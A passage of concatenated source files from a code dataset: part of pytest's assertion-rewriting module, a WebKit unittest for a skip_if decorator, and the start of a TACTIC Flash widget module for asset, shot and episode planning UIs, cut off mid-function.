            done = True
        if done:
            break
    if util._reprcompare is not None:
        custom = util._reprcompare(ops[i], each_obj[i], each_obj[i + 1])
        if custom is not None:
            return custom
    return expl
def _call_assertion_pass(lineno, orig, expl):
    # type: (int, str, str) -> None
    """Invoke the installed pytest_assertion_pass callback, if any."""
    if util._assertion_pass is not None:
        util._assertion_pass(lineno, orig, expl)
def _check_if_assertion_pass_impl():
    # type: () -> bool
    """Check if any plugin implements the pytest_assertion_pass hook
    in order not to generate explanations unnecessarily (might be expensive).
    """
    # bool() is the idiomatic form of ``True if x else False``.
    return bool(util._assertion_pass)
# %-templates for rewriting ast.UnaryOp nodes into explanation fragments;
# "%s" is filled with the operand's explanation.
UNARY_MAP = {ast.Not: "not %s", ast.Invert: "~%s", ast.USub: "-%s", ast.UAdd: "+%s"}

# Infix source symbols for ast.BinOp / ast.Compare operator node types,
# used when composing assertion explanation strings.
BINOP_MAP = {
    ast.BitOr: "|",
    ast.BitXor: "^",
    ast.BitAnd: "&",
    ast.LShift: "<<",
    ast.RShift: ">>",
    ast.Add: "+",
    ast.Sub: "-",
    ast.Mult: "*",
    ast.Div: "/",
    ast.FloorDiv: "//",
    ast.Mod: "%%",  # escaped for string formatting
    ast.Eq: "==",
    ast.NotEq: "!=",
    ast.Lt: "<",
    ast.LtE: "<=",
    ast.Gt: ">",
    ast.GtE: ">=",
    ast.Pow: "**",
    ast.Is: "is",
    ast.IsNot: "is not",
    ast.In: "in",
    ast.NotIn: "not in",
    ast.MatMult: "@",
}
def set_location(node, lineno, col_offset):
    """Recursively stamp *lineno*/*col_offset* onto *node* and all children.

    Returns *node* for convenience.
    """
    def _apply(current):
        # Only set the attributes a node type actually declares.
        if "lineno" in current._attributes:
            current.lineno = lineno
        if "col_offset" in current._attributes:
            current.col_offset = col_offset
        for child in ast.iter_child_nodes(current):
            _apply(child)

    _apply(node)
    return node
def _get_assertion_exprs(src: bytes) -> Dict[int, str]:
    """Returns a mapping from {lineno: "assertion test expression"}

    Tokenizes *src* and, for each ``assert`` statement, captures the exact
    source text of its test expression (excluding any ``, message`` part).
    """
    ret = {}  # type: Dict[int, str]
    depth = 0
    lines = []  # type: List[str]
    assert_lineno = None  # type: Optional[int]
    seen_lines = set()  # type: Set[int]
    def _write_and_reset() -> None:
        # Flush the accumulated expression text and reset the per-assert state.
        nonlocal depth, lines, assert_lineno, seen_lines
        assert assert_lineno is not None
        ret[assert_lineno] = "".join(lines).rstrip().rstrip("\\")
        depth = 0
        lines = []
        assert_lineno = None
        seen_lines = set()
    tokens = tokenize.tokenize(io.BytesIO(src).readline)
    for tp, source, (lineno, offset), _, line in tokens:
        if tp == tokenize.NAME and source == "assert":
            assert_lineno = lineno
        elif assert_lineno is not None:
            # keep track of depth for the assert-message `,` lookup
            if tp == tokenize.OP and source in "([{":
                depth += 1
            elif tp == tokenize.OP and source in ")]}":
                depth -= 1
            if not lines:
                lines.append(line[offset:])
                seen_lines.add(lineno)
            # a non-nested comma separates the expression from the message
            elif depth == 0 and tp == tokenize.OP and source == ",":
                # one line assert with message
                if lineno in seen_lines and len(lines) == 1:
                    offset_in_trimmed = offset + len(lines[-1]) - len(line)
                    lines[-1] = lines[-1][:offset_in_trimmed]
                # multi-line assert with message
                elif lineno in seen_lines:
                    lines[-1] = lines[-1][:offset]
                # multi line assert with escaped newline before message
                else:
                    lines.append(line[:offset])
                _write_and_reset()
            elif tp in {tokenize.NEWLINE, tokenize.ENDMARKER}:
                _write_and_reset()
            elif lines and lineno not in seen_lines:
                lines.append(line)
                seen_lines.add(lineno)
    return ret
class AssertionRewriter(ast.NodeVisitor):
"""Assertion rewriting implementation.
The main entrypoint is to call .run() with an ast.Module instance,
this will then find all the assert statements and rewrite them to
provide intermediate values and a detailed assertion error. See
http://pybites.blogspot.be/2011/07/behind-scenes-of-pytests-new-assertion.html
for an overview of how this works.
The entry point here is .run() which will iterate over all the
statements in an ast.Module and for each ast.Assert statement it
finds call .visit() with it. Then .visit_Assert() takes over and
is responsible for creating new ast statements to replace the
original assert statement: it rewrites the test of an assertion
to provide intermediate values and replace it with an if statement
which raises an assertion error with a detailed explanation in
case the expression is false and calls pytest_assertion_pass hook
if expression is true.
For this .visit_Assert() uses the visitor pattern to visit all the
AST nodes of the ast.Assert.test field, each visit call returning
an AST node and the corresponding explanation string. During this
state is kept in several instance attributes:
:statements: All the AST statements which will replace the assert
statement.
:variables: This is populated by .variable() with each variable
used by the statements so that they can all be set to None at
the end of the statements.
:variable_counter: Counter to create new unique variables needed
by statements. Variables are created using .variable() and
have the form of "@py_assert0".
:expl_stmts: The AST statements which will be executed to get
data from the assertion. This is the code which will construct
the detailed assertion message that is used in the AssertionError
or for the pytest_assertion_pass hook.
:explanation_specifiers: A dict filled by .explanation_param()
with %-formatting placeholders and their corresponding
expressions to use in the building of an assertion message.
This is used by .pop_format_context() to build a message.
:stack: A stack of the explanation_specifiers dicts maintained by
.push_format_context() and .pop_format_context() which allows
to build another %-formatted string while already building one.
This state is reset on every new assert statement visited and used
by the other visitors.
"""
    def __init__(self, module_path, config, source):
        """
        :param module_path: path of the module being rewritten (or None).
        :param config: pytest Config used to read ini options (or None).
        :param source: raw source of the module, used to recover the original
            assert expression text for the assertion-pass hook.
        """
        super().__init__()
        self.module_path = module_path
        self.config = config
        if config is not None:
            self.enable_assertion_pass_hook = config.getini(
                "enable_assertion_pass_hook"
            )
        else:
            # No config available (e.g. direct rewrite_asserts() use):
            # the experimental pass hook stays disabled.
            self.enable_assertion_pass_hook = False
        self.source = source
    @functools.lru_cache(maxsize=1)
    def _assert_expr_to_lineno(self):
        # Parsed lazily, once per rewriter instance.
        # NOTE(review): lru_cache on a method keeps `self` alive for the
        # cache's lifetime; with maxsize=1 this appears intentional -- confirm.
        return _get_assertion_exprs(self.source)
    def run(self, mod: ast.Module) -> None:
        """Find all assert statements in *mod* and rewrite them."""
        if not mod.body:
            # Nothing to do.
            return
        # Insert some special imports at the top of the module but after any
        # docstrings and __future__ imports.
        aliases = [
            ast.alias("builtins", "@py_builtins"),
            ast.alias("_pytest.assertion.rewrite", "@pytest_ar"),
        ]
        doc = getattr(mod, "docstring", None)
        expect_docstring = doc is None
        if doc is not None and self.is_rewrite_disabled(doc):
            return
        # Scan past the docstring and __future__ imports to find the
        # position (pos) and line number for the injected imports.
        pos = 0
        lineno = 1
        for item in mod.body:
            if (
                expect_docstring
                and isinstance(item, ast.Expr)
                and isinstance(item.value, ast.Str)
            ):
                doc = item.value.s
                if self.is_rewrite_disabled(doc):
                    return
                expect_docstring = False
            elif (
                not isinstance(item, ast.ImportFrom)
                or item.level > 0
                or item.module != "__future__"
            ):
                lineno = item.lineno
                break
            pos += 1
        else:
            # Module consists solely of docstring/__future__ imports.
            lineno = item.lineno
        imports = [
            ast.Import([alias], lineno=lineno, col_offset=0) for alias in aliases
        ]
        mod.body[pos:pos] = imports
        # Collect asserts.
        nodes = [mod]  # type: List[ast.AST]
        while nodes:
            node = nodes.pop()
            for name, field in ast.iter_fields(node):
                if isinstance(field, list):
                    new = []  # type: List
                    for i, child in enumerate(field):
                        if isinstance(child, ast.Assert):
                            # Transform assert.
                            new.extend(self.visit(child))
                        else:
                            new.append(child)
                            if isinstance(child, ast.AST):
                                nodes.append(child)
                    setattr(node, name, new)
                elif (
                    isinstance(field, ast.AST)
                    # Don't recurse into expressions as they can't contain
                    # asserts.
                    and not isinstance(field, ast.expr)
                ):
                    nodes.append(field)
@staticmethod
def is_rewrite_disabled(docstring):
return "PYTEST_DONT_REWRITE" in docstring
def variable(self):
"""Get a new variable."""
# Use a character invalid in python identifiers to avoid clashing.
name = "@py_assert" + str(next(self.variable_counter))
self.variables.append(name)
return name
def assign(self, expr):
"""Give *expr* a name."""
name = self.variable()
self.statements.append(ast.Assign([ast.Name(name, ast.Store())], expr))
return ast.Name(name, ast.Load())
    def display(self, expr):
        """Call saferepr on the expression."""
        # Delegates to the _saferepr helper so the repr is newline-escaped
        # for the explanation formatter.
        return self.helper("_saferepr", expr)
def helper(self, name, *args):
"""Call a helper in this module."""
py_name = ast.Name("@pytest_ar", ast.Load())
attr = ast.Attribute(py_name, name, ast.Load())
return ast.Call(attr, list(args), [])
def builtin(self, name):
"""Return the builtin called *name*."""
builtin_name = ast.Name("@py_builtins", ast.Load())
return ast.Attribute(builtin_name, name, ast.Load())
def explanation_param(self, expr):
"""Return a new named %-formatting placeholder for expr.
This creates a %-formatting placeholder for expr in the
current formatting context, e.g. ``%(py0)s``. The placeholder
and expr are placed in the current format context so that it
can be used on the next call to .pop_format_context().
"""
specifier = "py" + str(next(self.variable_counter))
self.explanation_specifiers[specifier] = expr
return "%(" + specifier + ")s"
def push_format_context(self):
"""Create a new formatting context.
The format context is used for when an explanation wants to
have a variable value formatted in the assertion message. In
this case the value required can be added using
.explanation_param(). Finally .pop_format_context() is used
to format a string of %-formatted values as added by
.explanation_param().
"""
self.explanation_specifiers = {} # type: Dict[str, ast.expr]
self.stack.append(self.explanation_specifiers)
    def pop_format_context(self, expl_expr):
        """Format the %-formatted string with current format context.
        The expl_expr should be an ast.Str instance constructed from
        the %-placeholders created by .explanation_param(). This will
        add the required code to format said string to .expl_stmts and
        return the ast.Name instance of the formatted string.
        """
        current = self.stack.pop()
        if self.stack:
            # Re-expose the parent context for further explanation params.
            self.explanation_specifiers = self.stack[-1]
        keys = [ast.Str(key) for key in current.keys()]
        format_dict = ast.Dict(keys, list(current.values()))
        form = ast.BinOp(expl_expr, ast.Mod(), format_dict)
        name = "@py_format" + str(next(self.variable_counter))
        if self.enable_assertion_pass_hook:
            # Tracked so visit_Assert can reset them after the hook fires.
            self.format_variables.append(name)
        self.expl_stmts.append(ast.Assign([ast.Name(name, ast.Store())], form))
        return ast.Name(name, ast.Load())
    def generic_visit(self, node):
        """Handle expressions we don't have custom code for."""
        # Name the value, then show its repr in the explanation.
        assert isinstance(node, ast.expr)
        res = self.assign(node)
        return res, self.explanation_param(self.display(res))
    def visit_Assert(self, assert_):
        """Return the AST statements to replace the ast.Assert instance.
        This rewrites the test of an assertion to provide
        intermediate values and replace it with an if statement which
        raises an assertion error with a detailed explanation in case
        the expression is false.
        """
        # assert (x,) is always true -- warn rather than silently "pass".
        if isinstance(assert_.test, ast.Tuple) and len(assert_.test.elts) >= 1:
            from _pytest.warning_types import PytestAssertRewriteWarning
            import warnings
            # Ignore type: typeshed bug https://github.com/python/typeshed/pull/3121
            warnings.warn_explicit(  # type: ignore
                PytestAssertRewriteWarning(
                    "assertion is always true, perhaps remove parentheses?"
                ),
                category=None,
                filename=self.module_path,
                lineno=assert_.lineno,
            )
        # Reset the per-assert codegen state (see the class docstring).
        self.statements = []  # type: List[ast.stmt]
        self.variables = []  # type: List[str]
        self.variable_counter = itertools.count()
        if self.enable_assertion_pass_hook:
            self.format_variables = []  # type: List[str]
        self.stack = []  # type: List[Dict[str, ast.expr]]
        self.expl_stmts = []  # type: List[ast.stmt]
        self.push_format_context()
        # Rewrite assert into a bunch of statements.
        top_condition, explanation = self.visit(assert_.test)
        # If in a test module, check if directly asserting None, in order to warn [Issue #3191]
        if self.module_path is not None:
            self.statements.append(
                self.warn_about_none_ast(
                    top_condition, module_path=self.module_path, lineno=assert_.lineno
                )
            )
        if self.enable_assertion_pass_hook:  # Experimental pytest_assertion_pass hook
            negation = ast.UnaryOp(ast.Not(), top_condition)
            msg = self.pop_format_context(ast.Str(explanation))
            # Failed
            if assert_.msg:
                assertmsg = self.helper("_format_assertmsg", assert_.msg)
                gluestr = "\n>assert "
            else:
                assertmsg = ast.Str("")
                gluestr = "assert "
            err_explanation = ast.BinOp(ast.Str(gluestr), ast.Add(), msg)
            err_msg = ast.BinOp(assertmsg, ast.Add(), err_explanation)
            err_name = ast.Name("AssertionError", ast.Load())
            fmt = self.helper("_format_explanation", err_msg)
            exc = ast.Call(err_name, [fmt], [])
            raise_ = ast.Raise(exc, None)
            statements_fail = []
            statements_fail.extend(self.expl_stmts)
            statements_fail.append(raise_)
            # Passed
            fmt_pass = self.helper("_format_explanation", msg)
            orig = self._assert_expr_to_lineno()[assert_.lineno]
            hook_call_pass = ast.Expr(
                self.helper(
                    "_call_assertion_pass",
                    ast.Num(assert_.lineno),
                    ast.Str(orig),
                    fmt_pass,
                )
            )
            # If any hooks implement assert_pass hook
            hook_impl_test = ast.If(
                self.helper("_check_if_assertion_pass_impl"),
                self.expl_stmts + [hook_call_pass],
                [],
            )
            statements_pass = [hook_impl_test]
            # Test for assertion condition
            main_test = ast.If(negation, statements_fail, statements_pass)
            self.statements.append(main_test)
            if self.format_variables:
                variables = [
                    ast.Name(name, ast.Store()) for name in self.format_variables
                ]
                clear_format = ast.Assign(variables, ast.NameConstant(None))
                self.statements.append(clear_format)
        else:  # Original assertion rewriting
            # Create failure message.
            body = self.expl_stmts
            negation = ast.UnaryOp(ast.Not(), top_condition)
            self.statements.append(ast.If(negation, body, []))
            if assert_.msg:
                assertmsg = self.helper("_format_assertmsg", assert_.msg)
                explanation = "\n>assert " + explanation
            else:
                assertmsg = ast.Str("")
                explanation = "assert " + explanation
            template = ast.BinOp(assertmsg, ast.Add(), ast.Str(explanation))
            msg = self.pop_format_context(template)
            fmt = self.helper("_format_explanation", msg)
            err_name = ast.Name("AssertionError", ast.Load())
            exc = ast.Call(err_name, [fmt], [])
            raise_ = ast.Raise(exc, None)
            body.append(raise_)
        # Clear temporary variables by setting them to None.
        if self.variables:
            variables = [ast.Name(name, ast.Store()) for name in self.variables]
            clear = ast.Assign(variables, ast.NameConstant(None))
            self.statements.append(clear)
        # Fix line numbers.
        for stmt in self.statements:
            set_location(stmt, assert_.lineno, assert_.col_offset)
        return self.statements
    def warn_about_none_ast(self, node, module_path, lineno):
        """
        Returns an AST issuing a warning if the value of node is `None`.
        This is used to warn the user when asserting a function that asserts
        internally already.
        See issue #3191 for more details.
        """
        val_is_none = ast.Compare(node, [ast.Is()], [ast.NameConstant(None)])
        # The warning body is generated by parsing source text; the template
        # must sit at column 0 to be valid module-level code.
        send_warning = ast.parse(
            """\
from _pytest.warning_types import PytestAssertRewriteWarning
from warnings import warn_explicit
warn_explicit(
    PytestAssertRewriteWarning('asserting the value None, please use "assert is None"'),
    category=None,
    filename={filename!r},
    lineno={lineno},
)
""".format(
                filename=module_path, lineno=lineno
            )
        ).body
        return ast.If(val_is_none, send_warning, [])
    def visit_Name(self, name):
        """Explain a bare name: its repr when resolvable, else the name itself."""
        # Display the repr of the name if it's a local variable or
        # _should_repr_global_name() thinks it's acceptable.
        locs = ast.Call(self.builtin("locals"), [], [])
        inlocs = ast.Compare(ast.Str(name.id), [ast.In()], [locs])
        dorepr = self.helper("_should_repr_global_name", name)
        test = ast.BoolOp(ast.Or(), [inlocs, dorepr])
        expr = ast.IfExp(test, self.display(name), ast.Str(name.id))
        return name, self.explanation_param(expr)
    def visit_BoolOp(self, boolop):
        """Rewrite and/or chains, generating nested ifs to keep Python's
        short-circuit evaluation semantics intact."""
        res_var = self.variable()
        expl_list = self.assign(ast.List([], ast.Load()))
        app = ast.Attribute(expl_list, "append", ast.Load())
        is_or = int(isinstance(boolop.op, ast.Or))
        body = save = self.statements
        fail_save = self.expl_stmts
        levels = len(boolop.values) - 1
        self.push_format_context()
        # Process each operand, short-circuiting if needed.
        for i, v in enumerate(boolop.values):
            if i:
                fail_inner = []  # type: List[ast.stmt]
                # cond is set in a prior loop iteration below
                self.expl_stmts.append(ast.If(cond, fail_inner, []))  # noqa
                self.expl_stmts = fail_inner
            self.push_format_context()
            res, expl = self.visit(v)
            body.append(ast.Assign([ast.Name(res_var, ast.Store())], res))
            expl_format = self.pop_format_context(ast.Str(expl))
            call = ast.Call(app, [expl_format], [])
            self.expl_stmts.append(ast.Expr(call))
            if i < levels:
                # For `or`, continue only while false; for `and`, while true.
                cond = res  # type: ast.expr
                if is_or:
                    cond = ast.UnaryOp(ast.Not(), cond)
                inner = []  # type: List[ast.stmt]
                self.statements.append(ast.If(cond, inner, []))
                self.statements = body = inner
        self.statements = save
        self.expl_stmts = fail_save
        expl_template = self.helper("_format_boolop", expl_list, ast.Num(is_or))
        expl = self.pop_format_context(expl_template)
        return ast.Name(res_var, ast.Load()), self.explanation_param(expl)
    def visit_UnaryOp(self, unary):
        """Rewrite a unary operation; explanation comes from UNARY_MAP."""
        pattern = UNARY_MAP[unary.op.__class__]
        operand_res, operand_expl = self.visit(unary.operand)
        res = self.assign(ast.UnaryOp(unary.op, operand_res))
        return res, pattern % (operand_expl,)
    def visit_BinOp(self, binop):
        """Rewrite a binary operation; explanation uses BINOP_MAP symbols."""
        symbol = BINOP_MAP[binop.op.__class__]
        left_expr, left_expl = self.visit(binop.left)
        right_expr, right_expl = self.visit(binop.right)
        explanation = "({} {} {})".format(left_expl, symbol, right_expl)
        res = self.assign(ast.BinOp(left_expr, binop.op, right_expr))
        return res, explanation
    def visit_Call(self, call):
        """
        visit `ast.Call` nodes

        Rewrites the callee and every argument, then names the call's result
        so the explanation can show both the call text and its value.
        """
        new_func, func_expl = self.visit(call.func)
        arg_expls = []
        new_args = []
        new_kwargs = []
        for arg in call.args:
            res, expl = self.visit(arg)
            arg_expls.append(expl)
            new_args.append(res)
        for keyword in call.keywords:
            res, expl = self.visit(keyword.value)
            new_kwargs.append(ast.keyword(keyword.arg, res))
            if keyword.arg:
                arg_expls.append(keyword.arg + "=" + expl)
            else:  # **args have `arg` keywords with an .arg of None
                arg_expls.append("**" + expl)
        expl = "{}({})".format(func_expl, ", ".join(arg_expls))
        new_call = ast.Call(new_func, new_args, new_kwargs)
        res = self.assign(new_call)
        res_expl = self.explanation_param(self.display(res))
        outer_expl = "{}\n{{{} = {}\n}}".format(res_expl, res_expl, expl)
        return res, outer_expl
    def visit_Starred(self, starred):
        # From Python 3.5, a Starred node can appear in a function call
        res, expl = self.visit(starred.value)
        new_starred = ast.Starred(res, starred.ctx)
        return new_starred, "*" + expl
    def visit_Attribute(self, attr):
        """Rewrite attribute loads; stores/deletes fall back to generic_visit."""
        if not isinstance(attr.ctx, ast.Load):
            return self.generic_visit(attr)
        value, value_expl = self.visit(attr.value)
        res = self.assign(ast.Attribute(value, attr.attr, ast.Load()))
        res_expl = self.explanation_param(self.display(res))
        pat = "%s\n{%s = %s.%s\n}"
        expl = pat % (res_expl, res_expl, value_expl, attr.attr)
        return res, expl
    def visit_Compare(self, comp: ast.Compare):
        """Rewrite (possibly chained) comparisons, recording every link's
        result so the failing link can be pinpointed at runtime."""
        self.push_format_context()
        left_res, left_expl = self.visit(comp.left)
        if isinstance(comp.left, (ast.Compare, ast.BoolOp)):
            left_expl = "({})".format(left_expl)
        res_variables = [self.variable() for i in range(len(comp.ops))]
        load_names = [ast.Name(v, ast.Load()) for v in res_variables]
        store_names = [ast.Name(v, ast.Store()) for v in res_variables]
        it = zip(range(len(comp.ops)), comp.ops, comp.comparators)
        expls = []
        syms = []
        results = [left_res]
        for i, op, next_operand in it:
            next_res, next_expl = self.visit(next_operand)
            if isinstance(next_operand, (ast.Compare, ast.BoolOp)):
                next_expl = "({})".format(next_expl)
            results.append(next_res)
            sym = BINOP_MAP[op.__class__]
            syms.append(ast.Str(sym))
            expl = "{} {} {}".format(left_expl, sym, next_expl)
            expls.append(ast.Str(expl))
            res_expr = ast.Compare(left_res, [op], [next_res])
            self.statements.append(ast.Assign([store_names[i]], res_expr))
            # Each link's right side becomes the next link's left side.
            left_res, left_expl = next_res, next_expl
        # Use pytest.assertion.util._reprcompare if that's available.
        expl_call = self.helper(
            "_call_reprcompare",
            ast.Tuple(syms, ast.Load()),
            ast.Tuple(load_names, ast.Load()),
            ast.Tuple(expls, ast.Load()),
            ast.Tuple(results, ast.Load()),
        )
        if len(comp.ops) > 1:
            res = ast.BoolOp(ast.And(), load_names)  # type: ast.expr
        else:
            res = load_names[0]
        return res, self.explanation_param(self.pop_format_context(expl_call))
def try_mkdir(cache_dir):
    """Attempt to create *cache_dir*; return True if it exists afterwards
    (or already existed), False when creation is impossible."""
    try:
        os.mkdir(cache_dir)
    except FileExistsError:
        # Either the __pycache__ directory already exists (the common case)
        # or it's blocked by a non-dir node; the latter is caught later,
        # when _write_pyc fails.
        return True
    except (FileNotFoundError, NotADirectoryError, PermissionError):
        # A missing/non-directory path component (e.g. inside a zip file)
        # or insufficient permissions: no cache for us.
        return False
    except OSError as exc:
        # as of now, EROFS doesn't have an equivalent OSError-subclass
        if exc.errno == errno.EROFS:
            return False
        raise
    return True
| apache-2.0 |
farhi-naz/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/test/skip_unittest.py | 124 | 3049 | # Copyright (C) 2010 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import StringIO
import logging
import unittest2 as unittest
from webkitpy.test.skip import skip_if
class SkipTest(unittest.TestCase):
    """Tests for skip_if(): it must log and skip the wrapped test only when
    the skip condition holds, and run it untouched otherwise."""

    def setUp(self):
        # Route this module's log records into an in-memory stream so the
        # tests can assert on the exact message skip_if() emits.
        self.logger = logging.getLogger(__name__)
        self.old_level = self.logger.level
        self.logger.setLevel(logging.INFO)
        self.old_propagate = self.logger.propagate
        self.logger.propagate = False
        self.log_stream = StringIO.StringIO()
        self.handler = logging.StreamHandler(self.log_stream)
        self.logger.addHandler(self.handler)
        self.foo_was_called = False

    def tearDown(self):
        self.logger.removeHandler(self.handler)
        # Bug fix: this previously assigned to ``self.propagate`` -- a plain
        # attribute on the TestCase -- so the logger's propagate flag was
        # never actually restored after setUp() disabled it.
        self.logger.propagate = self.old_propagate
        self.logger.setLevel(self.old_level)

    def create_fixture_class(self):
        # Minimal stand-in fixture: one test method that reports back through
        # the supplied callback when it actually runs.
        class TestSkipFixture(object):
            def __init__(self, callback):
                self.callback = callback

            def test_foo(self):
                self.callback()
        return TestSkipFixture

    def foo_callback(self):
        self.foo_was_called = True

    def test_skip_if_false(self):
        # A false condition must run the test body and log nothing.
        klass = skip_if(self.create_fixture_class(), False, 'Should not see this message.', logger=self.logger)
        klass(self.foo_callback).test_foo()
        self.assertEqual(self.log_stream.getvalue(), '')
        self.assertTrue(self.foo_was_called)

    def test_skip_if_true(self):
        # A true condition must skip the body and log the skip message.
        klass = skip_if(self.create_fixture_class(), True, 'Should see this message.', logger=self.logger)
        klass(self.foo_callback).test_foo()
        self.assertEqual(self.log_stream.getvalue(), 'Skipping webkitpy.test.skip_unittest.TestSkipFixture: Should see this message.\n')
        self.assertFalse(self.foo_was_called)
| bsd-3-clause |
hsuchie4/TACTIC | src/pyasm/deprecated/flash/widget/flash_shot_instance_adder_wdg.py | 6 | 12267 | ###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ['FlashShotInstanceAdderWdg', 'FlashLayerInstanceAdderWdg', 'FlashEpisodePlannerWdg', 'FlashLayerStageWdg', 'EpisodePlannerCbk']
from pyasm.web import *
from pyasm.widget import *
from pyasm.search import *
from pyasm.biz import *
from pyasm.flash import *
from pyasm.prod.biz import *
from pyasm.prod.web import *
class FlashAssetFilter(DivWdg):
    """Search-filter UI for flash assets: an episode navigator plus a
    free-text search box whose values are applied to a Search object via
    alter_search().  (Legacy TACTIC style: ``my`` is used in place of self.)"""

    def init(my):
        # Episode drop-down; its current value is captured for alter_search().
        nav = EpisodeNavigatorWdg(name="initial_episode")
        nav.add_none_option()
        my.episode_code = nav.get_value()
        my.add(nav)
        # Free-text search box; persists its value across form submits.
        text_wdg = TextWdg("asset_search")
        text_wdg.set_persist_on_submit()
        text_wdg.add_style('margin-bottom: 3px')
        my.asset_search = text_wdg.get_value()
        my.add(SpanWdg(text_wdg, css='med'))

    def alter_search(my, search):
        """Narrow *search* by the selected episode and/or the search text."""
        has_filter = False
        if my.episode_code != "":
            search.add_filter("episode_code", my.episode_code)
            has_filter = True
        if my.asset_search != "":
            # Case-insensitive regex match across all searchable columns.
            my.asset_search = my.asset_search.lower()
            columns = my.get_search_columns()
            expr = [Search.get_regex_filter(x, my.asset_search) for x in columns]
            filter = "(%s)" %" or ".join(expr)
            search.add_where(filter)
            has_filter = True
        #if not has_filter:
        # search.add_where("NULL")

    def get_search_columns(my):
        # Columns the free-text search is matched against.
        return ['code','name','description']
class FlashEpisodeFilterWdg(EpisodeFilterWdg):
    # Plain alias of the generic episode filter, kept so Flash-specific
    # behavior can be added later without touching callers.
    pass


class FlashEpisodeShotNavigatorFilter(EpisodeShotFilterWdg):
    """Episode/shot navigator that filters by the selected shot code."""

    def alter_search(my, search):
        # Empty value means "no shot selected" -> no filtering.
        if my.get_value() != "":
            search.add_filter("shot_code", my.get_value())
class FlashShotInstanceAdderWdg(ShotInstanceAdderWdg):
    """Two-pane widget for adding asset instances to shots, with a
    'Populate with Assets' staging action specific to Flash."""

    CONTAINER_NAME = 'Shots'
    BUTTON_LABEL = "Populate with Assets"
    LOAD_MODE = 'load_mode'        # form key controlling how assets are loaded
    PREFIX_MODE = 'prefix_mode'    # form key controlling folderless naming

    def get_left_filter(my, search=None):
        """Build the asset-side (left pane) filter stack."""
        widget = Widget()
        asset_filter = AssetFilterWdg()
        asset_filter.alter_search(search)
        widget.add(asset_filter)
        widget.add( HtmlElement.br(2) )
        instance_filter = EpisodeInstanceFilterWdg()
        instance_filter.alter_search(search)
        widget.add(instance_filter)
        # Checkbox toggling whether the episode-planner filter is active.
        use_epi = FilterCheckboxWdg( EpisodeInstanceFilterWdg.OPTION_NAME,\
            label='Filter by Episode Planner')
        widget.add(use_epi)
        return widget

    def get_right_filter(my, search):
        """Build the shot-side (right pane) episode filter."""
        filter = FlashEpisodeFilterWdg()
        filter.add_none_option()
        return filter

    def get_action_wdg(my):
        """Build the action bar: add/remove buttons plus the staging button."""
        main_div = DivWdg(css="filter_box center_content")
        div = DivWdg()
        main_div.add(div)
        div.add_style('height', '16px')
        div.add_style('margin', '3px 0 3px 0')
        div.add(HtmlElement.b("Action: "))
        add_button = IconSubmitWdg(my.ADD_BUTTON, IconWdg.ADD, long=True)
        div.add(add_button)
        remove_button = IconSubmitWdg("Remove from %s" % my.CONTAINER_NAME, IconWdg.DELETE, long=True)
        div.add(remove_button)
        # register the add commands
        # TODO: make into ajax:
        for cbk in my.get_action_cbk():
            WebContainer.register_cmd(cbk)
        stage_button = IconSubmitWdg(my.BUTTON_LABEL, long=True)
        div.add(SpanWdg(stage_button, css='large'))
        # add a hint
        hint = HintWdg('To populate a shot with assets, you need to first [Add Assets] to the shot. ' \
            'Then you can check the checkbox for the shot and click on [%s]' % my.BUTTON_LABEL)
        div.add(hint)
        # Hidden form state consumed by the staging widget below.
        div.add(HiddenWdg(my.LOAD_MODE, 'merge'))
        folderless = HiddenWdg(my.PREFIX_MODE, 'true')
        folderless.set_attr('checked','1')
        div.add(folderless)
        div.add(FlashShotStageWdg())
        return main_div
class FlashEpisodePlannerWdg(SequencePlannerWdg):
    """Planner widget for assigning assets to an episode."""

    ADD_BUTTON = "Add Assets to Episode"

    def get_left_filter(my, search):
        # Left pane: plain asset filter, no search alteration needed here.
        return AssetFilterWdg()

    def get_action_wdg(my):
        """Build the action bar with the single 'add to episode' button."""
        main_div = DivWdg(css="filter_box center_content")
        div = DivWdg()
        div.add_style('height', '16px')
        div.add_style('margin', '3px 0 3px 0')
        main_div.add(my.get_view_select())
        main_div.add(div)
        div.add(HtmlElement.b("Action: "))
        add_button = IconSubmitWdg(my.ADD_BUTTON, IconWdg.ADD, long=True)
        div.add(add_button)
        # Callback class (below) handles the button submit.
        WebContainer.register_cmd("pyasm.flash.widget.EpisodePlannerCbk")
        return main_div


class EpisodePlannerCbk(SequencePlannerCbk):
    """Server-side callback for FlashEpisodePlannerWdg's add button."""

    def check(my):
        # Only fire when the add button was the one submitted.
        web = WebContainer.get_web()
        if web.get_form_value(FlashEpisodePlannerWdg.ADD_BUTTON) != "":
            return True
        return False
class FlashLayerInstanceAdderWdg(ShotInstanceAdderWdg):
    """Two-pane widget for adding asset instances to layers (not shots)."""

    CONTAINER_NAME = 'Layers'
    BUTTON_LABEL = "Populate with Assets"
    LOAD_MODE = 'load_mode'
    PREFIX_MODE = 'prefix_mode'

    def get_left_search_type(my):
        return "prod/asset"

    def get_right_search_type(my):
        return "prod/layer"

    def get_left_filter(my, search):
        # NOTE(review): unlike the shot adder, this filter is not given the
